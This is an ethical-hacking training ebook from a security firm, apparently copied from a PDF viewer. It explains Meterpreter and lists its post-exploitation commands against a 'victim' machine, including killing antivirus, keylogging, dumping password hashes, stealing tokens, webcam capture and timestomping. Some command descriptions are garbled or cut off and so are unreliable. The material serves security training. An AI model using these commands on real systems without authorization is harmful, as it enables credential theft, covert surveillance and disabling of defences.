seculabs ebook - meterpreter cheatsheet commands

7/29/2019 Seculabs eBook - Meterpreter Cheatsheet Commands

http://slidepdf.com/reader/full/seculabs-ebook-meterpreter-cheatsheet-commands 1/15



SECUGENIUS SECURITY SOLUTIONS

--------------------------------------------------------------------------------------

(A UNIT OF HARKSH TECHNOLOGIES PVT. LTD)

Company Profile:

Secugenius Security Solutions is a Student Entrepreneurial Company started by 2 Social Student

Entrepreneurs in 2010 with an aim to make our country Cyber Crime Free. We at SECUGENIUS

are headquartered at Ludhiana, the Manchester of Punjab. The main activities of Secugenius

Security Solutions are providing training in Information Security and various professional courses.

Secugenius Security Solutions is an organization which believes in inventing and implementing newideas to influence the technological minds of the youngsters

Looking at the number of Cyber Crimes since last many years, We at Secugenius Security

Solutions provides training on Ethical hacking & Cyber Security to students, IT Professionals, Bank

Employees, Police officials.

Secugenius conducts workshops in all parts of the country in various Colleges/institutions for the

benefit of the students & making them aware of the latest trends in technological era of the

Computer age. We believe in spreading knowledge to all the youngsters & growing minds of the

nation so that they could serve the nation with perfect skill-sets in the field of Cyber Crime

Investigation & Forensic Sciences

Secugenius provides various security solutions to its clients by securing their websites from cyber

attacks. We provide training to college students, graduates and professionals in various fields.

Education is delivered to students through two modes i.e. Regular mode and Distance mode which

are available as short term and long term courses.

In the workshops conducted by Secugenius, participants can claim to be trained by the highly

experienced & skilled corporate trainers from different parts of the nation. We believe in making

the base of students to be as strong as possible. All the modules have been designed in order to

provide students with specialized knowledge by specialized trainers.

This library was furnished, managed and funded by the Founders and Directors of Secugenius

Er. Harpreet Khattar & Er. Kshitij Adhlakha. The overall resource person for the content of

the series of this Digital Library is Er. Chetan Soni - Sr. Security Specialist, Secugenius Security

Solutions.

This Online Digital Library has been initiated as a free resource & permanent

resource on specialization basis for every student of Team Secugenius.



Meterpreter Cheat sheet Commands

Product ID No: SG/ODL/13049

Founder & Director: Harpreet Khattar & Kshitij Adhlakha

Resource Person: Chetan Soni & Annuraj

Secugenius Security Solutions

SCO-13A, Model Town Extn, Near Krishna Mandir,

Ludhiana-141002, Punjab – India

[email protected], [email protected]

www.secugenius.com , www.seculabs.in

mailto:[email protected]





http://www.secugenius.com/


http://www.seculabs.in/









Meterpreter –

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLLinjection stagers and is extended over the network at runtime.

It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Meterpreter was originally written by skape for Metasploit 2.x; a common extension wasmerged for 3.x and is currently undergoing an overhaul for Metasploit 3.3.

The server portion is implemented in plain C and is now compiled with MSVC, making itsomewhat portable. The client can be written in any language but Metasploit has a full-featured Ruby client API.

How Meterpreter Works

i. The target executes the initial stager. This is usually one of bind, reverse, findtag, passivex, etc.

ii. The stager loads the DLL prefixed with Reflective. The Reflective stub handles the

loading/injection of the DLL.

iii. The Meterpreter core initializes, establishes a TLS/1.0 link over the socket and sends a GET.

Metasploit receives this GET and configures the client.

iv. Lastly, Meterpreter loads extensions. It will always load stdapi and will load priv if the module

gives administrative rights. All of these extensions are loaded over TLS/1.0 using a TLV

protocol.(Reference - http://www.offensive-security.com )

Since the Meterpreter provides a whole new environment, we will cover some of thebasic Meterpreter commands to get you started and help you get familiar with this mostpowerful tool.

Throughout this EBook, almost every available Meterpreter command is covered.

For those that aren't covered, experimentation

is the key to successful learning.

http://www.offensive-security.com/






sysinfo

It shows the system build x86 or x64, language version, build...etc

run checkvm

It checks to see if the victim is running a Virtual Machine or native.

route

Dumps the routing table to the screen and shows how the subnet has beenconfigured...etc



run get_application_list

This shows you the applications installed on the remote PC.

idletime

It shows how long the victim has not been active on the computer.

getpid

This is to get the process ID and shows the process of which you are currentlyrunning off.

getuid

This will show you the system identity and show you who you are running assuch as system.



ps

This shows all the processes running on the victim as well as the PID's.

getsystem

This gives you local system privileges.

run get_env

This will give you a lot of info on the system.



execute -f cmd.exe -H – c

Open a command prompt on a hidden channel.

interact 1

Interact with a channel "1" will be replaced with the channel you want to interactwith.

Download

This command will download the specified command.

"Example" download c:\\boot.ini

upload

Upload files to the victim machine.



portfwd

This command forwards a local port to a remote service.

run getgui – e

This will enable remote desktop on the victim.

run getcountermeasure

It checks the security configuration on the exploited machine and it can disablecountermeasures such as AV, firewalls, etc



run killav

It is designed to kill most AVs that are running as a service on the exploitedmachine.

run get_local_subnets

It is used to get the local subnet of the victim machine.

run remotewinenum

It is designed to enumerate the target system with the wmic command.

load

Load One or More Meterpreter Extensions.



channel

Displays Info about Active Channels.

keyscan_start

Start Capturing Keystrokes

Getdesktop

setdesktop

Change the Meterpreters Current Desktop.

reboot

Reboots the Remote Computer.



getprivs

Attempt to Enable All Privileges Available to the Current Pro

regInteract with the Remote Registry



shell

Drop into a system shell.

shutdown

Shuts Down the Remote Computer

steal_token

Attempt to Steal an Impersonation Token from the Process

execute

Execute a command.

infoDisplay info about active post module.

hashdump

Dumps the content of the SAM Database.

timestomp

Manipulates MACE Attributes

quit Terminate the meterpreter session.

getwd

Print Working Directory



webcam_list

List webcams.

webcam_snap

Take a snapshot from the specified webcam.

(Photo of Mr. Annuraj)

mkdir

Make directory.



pwd

Print working directory.

drop_token

Relinquishes Any Active Impersonation Token

rmdir

Remove directory.

del

Delete file "example" del passwords.txt

seculabs ebook - meterpreter cheatsheet commands

Documents